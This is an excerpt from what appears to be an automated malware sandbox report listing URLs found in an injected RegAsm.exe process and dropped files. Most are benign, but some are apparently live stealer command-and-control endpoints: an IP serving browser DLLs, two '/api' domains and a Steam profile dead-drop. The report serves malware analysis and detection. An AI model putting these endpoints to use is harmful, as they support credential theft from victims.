                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                          Source: ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://ocsp.entrust.net02
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://ocsp.entrust.net03
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, softokn3.dll.3.dr, nss3.dll.3.dr, ECBKKKFHCF.exe.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: file.exe, 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.drString found in binary or memory: http://www.entrust.net/rpa03
                          Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: RegAsm.exe, 00000003.00000002.2815100827.000000002032D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://49.12.197.9
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dll#
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/freebl3.dllN
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/mozglue.dlli
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/msvcp140.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllU
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/nss3.dllp
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/softokn3.dll3-w
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000055D000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/sqlp.dlli
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9/vcruntime140.dll~
                          Source: RegAsm.exe, 00000003.00000002.2801902141.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://49.12.197.9FIECGD
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/1o
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://absorptioniw.site/api
                          Source: CAAKFI.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: CAAKFI.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: CAAKFI.3.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: CAAKFI.3.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.co
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=2ZRoxzol
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=fWwP
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=HeLxjRDbQrcV&l=e
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                          Source: 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
                          Source: RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
                          Source: RegAsm.exe, 00000003.00000002.2803671443.0000000001354000.00000004.00000020.00020000.00000000.sdmp, BAKEBA.3.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: CAAKFI.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/#
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api#
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/apij
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store:443/apifiles/76561199724331900537.36
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
